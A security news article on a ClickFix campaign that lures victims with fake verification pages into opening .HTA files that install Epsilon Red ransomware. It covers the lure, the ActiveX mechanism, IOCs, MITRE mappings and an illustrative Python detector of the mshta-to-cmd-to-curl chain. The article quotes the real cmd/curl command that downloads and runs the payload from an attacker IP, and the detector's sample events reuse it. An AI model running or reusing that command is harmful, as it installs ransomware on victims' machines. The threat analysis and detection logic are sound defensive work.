Hackers Lure Victims into Downloading Malicious .HTA Files to Deploy Red Ransomware

Security researchers at CloudSEK’s TRIAD have uncovered an ongoing malware campaign that uses ClickFix-themed landing pages to deliver Epsilon Red ransomware through malicious .HTA (HTML Application) files.

The campaign abuses a legacy Windows scripting feature, ActiveX, which an .HTA file can reach because it is executed by mshta.exe rather than inside a sandboxed browser. Once social engineering persuades the victim to open the file, the attacker can run shell commands on the victim’s Windows machine with the privileges of the logged-on user.

From Social Lures to Remote Code Execution

Unlike earlier ClickFix campaigns, which rely on the victim pasting a copied command into a Run dialog, this iteration entices users to interact with fake verification screens that impersonate widely used services such as Discord Captcha Bot, Twitch, OnlyFans, and Kick.

After clicking a seemingly benign verification link, the victim is redirected to a secondary page that delivers the .HTA file. When the file is opened, its embedded JavaScript instantiates a WScript.Shell ActiveXObject and silently invokes commands that retrieve and execute the ransomware binary.

According to the CloudSEK report, the campaign’s social engineering layer is polished. The fake verification codes contain deliberate typographical errors (for example, “Verificatification”) intended to look harmless or amateurish and so reduce suspicion.

Technical analysis shows that once the victim opens the file, the following command runs in the background:
cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe

This chain changes the working directory to the user’s profile (cd /D %userprofile%), downloads the ransomware payload to a.exe with curl in silent mode (-s suppresses progress output), and then executes the binary. curl.exe ships with Windows 10 and later, so no extra tooling has to be staged. No command prompt window is shown; an .HTA typically achieves this by passing a hidden window style to the Run method of WScript.Shell.

A subsequent shell operation displays a fake verification message:
Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4
This is a deliberate effort to reinforce the ruse: the victim sees the “code” they expected and has no reason to suspect that the payload has already been run.

Figure: the fake verification message shown to the victim.

Deceptive Service Impersonation

Further investigation and pivoting on connected infrastructure revealed a small but persistent cluster of related domains and IPs masquerading as verification portals for popular services.

The attackers also operate additional clickfix delivery pages themed around online dating and romance, significantly broadening the potential victim base.

Figure: ClickFix-themed malware delivery page.

This persistent, multi-themed infrastructure reflects a well-planned, long-term operation, capitalizing on familiarity and trust associated with legitimate platforms.

Epsilon Red ransomware, first identified in 2021, mimics elements of the notorious REvil ransomware in its ransom note formatting but remains distinct in its infection vectors and command infrastructure.

Historical campaigns have consistently used scheduled tasks for persistence after initial infection and HTTP for command and control.

The abuse of ActiveX and WScript.Shell gives the attacker code execution as soon as the .HTA file is opened. Modern browsers do not expose ActiveXObject at all; the technique works because mshta.exe runs the file outside the browser sandbox, so the usual web-based protections never apply and the payload can be deployed with very limited visibility.

Once initial access is established, the ransomware encrypts victim data, often following lateral movement within the network.

Defenders are urged to mitigate these attacks proactively by disabling legacy script execution vectors such as ActiveX and Windows Script Host via Group Policy, restricting or blocking mshta.exe (the .HTA host) with application control, consuming threat intelligence feeds to block the indicators listed below in real time, and using endpoint detection to flag hidden or suspicious child processes (cmd.exe, curl.exe) spawned by mshta.exe or by browsers.
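As an added example, not code from the article or from CloudSEK’s report, the following Python sketch turns the command chain quoted above and the detection advice in this paragraph into working logic: it refangs the published IOCs, matches them against process-creation telemetry, and flags the script-host or browser -> cmd.exe -> curl download-and-execute pattern. It generalises slightly beyond the reported case (browsers and other script hosts as parents, any curl -o target). The Sysmon-style records, the 203.0.113.10 and example.invalid hosts, and the reason codes are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Indicators from the article's IOC table, kept defanged at rest as published.
IOC_HOSTS_DEFANGED = {"155.94.155[.]227", "213.209.150[.]188", "twtich[.]cc", "capchabot[.]cc"}

def refang(value: str) -> str:
    """Turn published 'a[.]b' / hxxp notation back into a matchable string."""
    return value.replace("[.]", ".").replace("hxxp", "http")

IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}   # hosts that expose WScript.Shell
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

URL_RE = re.compile(r"https?://[^\s\"'&]+")
CURL_OUT_RE = re.compile(r"\bcurl\b[^&|]*?\s-o\s+(\S+)")   # curl ... -o <file>

def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").split("\\")[-1].lower()

def extract_download(cmdline: str):
    """Return (url, output_file) when the command line downloads with 'curl -o', else None."""
    m_url, m_out = URL_RE.search(cmdline), CURL_OUT_RE.search(cmdline)
    if not (m_url and m_out):
        return None
    return m_url.group(0), m_out.group(1)

def score_event(ev: dict) -> list:
    """Reason codes for which a process-creation event resembles the .HTA -> cmd -> curl chain."""
    reasons = []
    parent, image, cmdline = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if image in SHELLS and parent in SCRIPT_HOSTS:
        reasons.append("script_host_shell")       # cmd.exe whose parent is mshta.exe etc.
    elif image in SHELLS and parent in BROWSERS:
        reasons.append("browser_shell")           # a browser should never spawn a shell
    if re.search(r"\bcd\s+/D\s+%userprofile%", cmdline, re.IGNORECASE):
        reasons.append("userprofile_staging")     # the 'cd /D %userprofile%' seen in the campaign
    dl = extract_download(cmdline)
    if dl:
        url, out_file = dl
        # If the last '&&' segment is the downloaded file, this is download-and-execute in one go.
        tail = cmdline.split("&&")[-1].strip().strip('"')
        if basename(tail) == basename(out_file):
            reasons.append("download_and_execute")
        if urlparse(url).hostname in IOC_HOSTS:
            reasons.append("known_ioc_host")
    return reasons

def detect(events) -> dict:
    """Map RecordId -> reason codes for every event that triggers at least one reason."""
    hits = {}
    for ev in events:
        r = score_event(ev)
        if r:
            hits[ev["RecordId"]] = r
    return hits

# Constructed Sysmon-style (Event ID 1) records for illustration; not real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 101, "ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": refang("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe")},
    {"RecordId": 102, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c dir "%userprofile%\Documents"'},
    {"RecordId": 103, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c curl -s -o update.exe http://203.0.113.10/update.exe && update.exe"},
    {"RecordId": 104, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c curl -s -o report.json https://api.example.invalid/report"},
]

if __name__ == "__main__":
    for record_id, reasons in detect(SAMPLE_EVENTS).items():
        print(record_id, ", ".join(reasons))
```

Feed it real Sysmon Event ID 1 or EDR process-creation data as dicts with ParentImage, Image and CommandLine fields. The host match alone is brittle because the operators rotate infrastructure; the behavioural reasons (a shell spawned by a script host or browser, and download-and-execute within a single command line) are the ones worth alerting on.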

Cybersecurity awareness training should specifically cover verification-style lures: no legitimate service asks a user to download and open a file in order to complete a captcha or identity check.

The campaign’s reliance on masquerading, drive-by compromise, and silent binary downloads maps to several recognized MITRE ATT&CK techniques, including T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.007 (Command and Scripting Interpreter: JavaScript), T1204.001 (User Execution: Malicious Link), and T1486 (Data Encrypted for Impact).

The increasing sophistication of such delivery mechanisms underscores the ongoing need for both technological and human defenses against ransomware operations that exploit trust in online platforms and the legacy script hosts still present on Windows.

Indicators of Compromise (IOCs)

Indicator Type | Value                            | Notes
MD5            | 98107c01ecd8b7802582d404e007e493 | Epsilon Red ransomware
Domain         | twtich[.]cc                      | ClickFix delivery (.hta)
IP:Port        | 155.94.155[.]227:2269            | Command and control (also the payload download host in the command above)
MD5            | 2db32339fa151276d5a40781bc8d5eaa | Quasar RAT
Domain         | capchabot[.]cc                   | ClickFix delivery (regular page)
IP:Port        | 213.209.150[.]188:8112           | Command and control
